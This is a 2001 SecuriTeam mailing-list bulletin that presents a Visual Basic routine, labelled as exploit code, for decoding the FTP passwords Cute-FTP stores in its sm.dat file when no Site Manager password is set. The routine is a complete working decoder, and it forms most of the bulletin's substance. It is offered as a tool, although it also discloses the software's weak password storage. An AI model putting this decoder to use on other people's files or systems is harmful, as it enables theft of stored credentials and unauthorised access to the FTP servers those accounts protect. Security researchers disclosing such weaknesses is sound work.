[TOOL] Cute-FTP Stored Password Decoder

From: support@securiteam.com
Date: 08/31/01 

From: support@securiteam.com
To: list@securiteam.com
Subject: [TOOL] Cute-FTP Stored Password Decoder
Message-Id: <20010831112502.2CD20138BF@mail.der-keiler.de>
Date: Fri, 31 Aug 2001 13:25:02 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Cute-FTP Stored Password Decoder
------------------------------------------------------------------------

DETAILS

This piece of VB code will decode the passwords stored in sm.dat for the
FTP accounts .

This works only if you did not set a password on the Site Manager!

Exploit code:
'Decode a single character
Public Function CuteDecode(i_Asc As Integer)

   CuteDecode = ((Not i_Asc) And 200) + (i_Asc And 55)
   
End Function

'Decode password
Public Function CuteDecodeString(str_password As String)

   Dim i As Integer

   CuteDecodeString = ""

   For i = 1 To Len(str_password)
      CuteDecodeString = CuteDecodeString +
Chr$(CuteDecode(Asc(Mid(str_password, i, 1))))
   Next i

End Function

ADDITIONAL INFORMATION

The tool has been provided by <mailto:evelk@dsv.nl> E. van Elk.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.